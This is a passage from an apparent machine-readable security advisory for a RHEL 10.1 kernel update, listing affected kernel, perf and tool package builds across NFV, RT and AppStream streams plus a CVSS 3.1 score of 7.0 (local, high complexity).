"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
